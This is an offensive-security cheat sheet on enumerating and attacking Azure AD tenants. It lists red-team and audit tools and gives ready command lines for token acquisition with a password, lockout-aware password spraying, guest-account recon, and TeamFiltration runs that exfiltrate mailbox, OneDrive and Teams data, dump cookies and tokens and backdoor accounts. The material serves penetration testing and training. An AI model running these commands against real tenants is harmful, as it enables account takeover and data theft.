Azure AD - Enumerate
Azure AD - Collectors
- Microsoft Portals - Microsoft Administrator Sites
- dirkjanm/ROADTool - A collection of Azure AD tools for offensive and defensive security purposes
- BloodHoundAD/AzureHound - Azure Data Exporter for BloodHound
- BloodHoundAD/BARK - BloodHound Attack Research Kit
. .\BARK.ps1 $MyRefreshTokenRequest = Get-AZRefreshTokenWithUsernamePassword -username "user@contoso.onmicrosoft.com" -password "MyVeryCoolPassword" -TenantID "contoso.onmicrosoft.com" $MyMSGraphToken = Get-MSGraphTokenWithRefreshToken -RefreshToken $MyRefreshTokenRequest.refresh_token -TenantID "contoso.onmicrosoft.com" $MyAADUsers = Get-AllAzureADUsers -Token $MyMSGraphToken.access_token -ShowProgress
- dafthack/GraphRunner - A Post-exploitation Toolset for Interacting with the Microsoft Graph API
- NetSPI/MicroBurst - MicroBurst includes functions and scripts that support Azure Services discovery, weak configuration auditing, and post exploitation actions such as credential dumping
- hausec/PowerZure - PowerShell framework to assess Azure security
- silverhack/monkey365 - Microsoft 365, Azure subscriptions and Microsoft Entra ID security configuration reviews.
- prowler-cloud/prowler - Prowler is an Open Source Security tool for AWS, Azure, GCP and Kubernetes to do security assessments, audits, incident response, compliance, continuous monitoring, hardening and forensics readiness. Includes CIS, NIST 800, NIST CSF, CISA, FedRAMP, PCI-DSS, GDPR, HIPAA, FFIEC, SOC2, GXP, Well-Architected Security, ENS and more
- projectdiscovery/nuclei-templates - Community curated list of templates for the nuclei engine to find security vulnerabilities.
- nccgroup/ScoutSuite - Multi-Cloud Security Auditing Tool
- Flangvik/TeamFiltration - TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts
TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --exfil --cookie-dump C:\\CookieData.txt --all TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --exfil --aad TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --exfil --tokens C:\\OutputTokens.txt --onedrive --owa TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --exfil --teams --owa --owa-limit 5000 TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --debug --exfil --onedrive TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --enum --validate-teams TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --enum --validate-msol --usernames C:\Clients\2021\FooBar\OSINT\Usernames.txt TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --backdoor TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --database
- Azure/StormSpotter - This repository has not been updated recently - Azure Red Team tool for graphing Azure and Azure Active Directory objects
- nccgroup/Azucar - This repository has been archived - Azucar automatically gathers a variety of configuration data and analyses all data relating to a particular subscription in order to determine security risks.
- FSecureLABS/Azurite - This repository has not been updated recently - Enumeration and reconnaissance activities in the Microsoft Azure Cloud.
- cyberark/SkyArk - This repository has not been updated recently - Discover the most privileged users in the scanned Azure environment - including the Azure Shadow Admins.
Azure AD - User Enumeration
Enumerate Tenant Informations
- Federation with Azure AD or O365
- Get the Tenant ID
Enumerate from a Guest Account
powerpwn recon --tenant {tenantId} --cache-path {path}
powerpwn dump -tenant {tenantId} --cache-path {path}
powerpwn gui --cache-path {path}
Enumerate Emails
By default, O365 has a lockout policy of 10 tries, and it will lock out an account for one (1) minute.
- Validate email
- Extract email lists with a valid credentials : https://github.com/nyxgeek/o365recon
Password Spraying
The default lockout policy tolerates 10 failed attempts, then lock out an account for 60 seconds.
- dafthack/MSOLSpray
- 0xZDH/o365spray
- Flangvik/TeamFiltration
TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --spray --sleep-min 120 --sleep-max 200 --push --shuffle-users --shuffle-regions TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --spray --push-locked --months-only --exclude C:\Clients\2021\FooBar\Exclude_Emails.txt TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --spray --passwords C:\Clients\2021\FooBar\Generic\Passwords.txt --time-window 13:00-22:00
Azure Services Enumeration
Enumerate Tenant Domains
Extract openly available information for the given tenant: aadinternals.com/osint
Invoke-AADIntReconAsOutsider -DomainName <DOMAIN>
Invoke-AADIntReconAsOutsider -Domain "company.com" | Format-Table
Invoke-AADIntReconAsOutsider -UserName "user@company.com" | Format-Table
Enumerate Azure Subdomains
PS> . C:\Tools\MicroBurst\Misc\InvokeEnumerateAzureSubDomains.ps1
PS> Invoke-EnumerateAzureSubDomains -Base <TENANT NAME> -Verbose
Subdomain Service
--------- -------
<TENANT NAME>.mail.protection.outlook.com Email
<TENANT NAME>.onmicrosoft.com Microsoft Hosted Domain
Enumerate Services
-
Using Az Powershell module
# Enumerate resources PS Az> Get-AzResource # List all VM's the user has access to PS Az> Get-AzVM # Get all webapps PS Az> Get-AzWebApp | ?{$_.Kind -notmatch "functionapp"} # Get all function apps PS Az> Get-AzFunctionApp # List all storage accounts PS Az> Get-AzStorageAccount # List all keyvaults PS Az> Get-AzKeyVault # Get all application objects registered using the current tenant PS AzureAD> Get-AzureADApplication -All $true # Enumerate role assignments PS Az> Get-AzRoleAssignment -Scope /subscriptions/<SUBSCRIPTION-ID>/resourceGroups/RESEARCH/providers/Microsoft.Compute/virtualMachines/<VM-NAME> PS Az> Get-AzRoleAssignment -SignInName test@<TENANT NAME>.onmicrosoft.com # Check AppID Alternative Names/Display Name PS AzureAD> Get-AzureADServicePrincipal -All $True | ?{$_.AppId -eq "<APP-ID>"} | fl
-
Using az cli
Multi Factor Authentication
- dafthack/MFASweep - A tool for checking if MFA is enabled on multiple Microsoft Services
References
- Bypassing conditional access by faking device compliance - @DrAzureAD - September 06, 2020
- CARTP-cheatsheet - Azure AD cheatsheet for the CARTP course
- Attacking Azure/Azure AD and introducing Powerzure - SpecterOps - Ryan Hausknecht - Jan 28, 2020
- Training - Attacking and Defending Azure Lab - Altered Security
- Azure Config Review - Nuclei Templates v10.0.0 - Prince Chaddha - Sep 12, 2024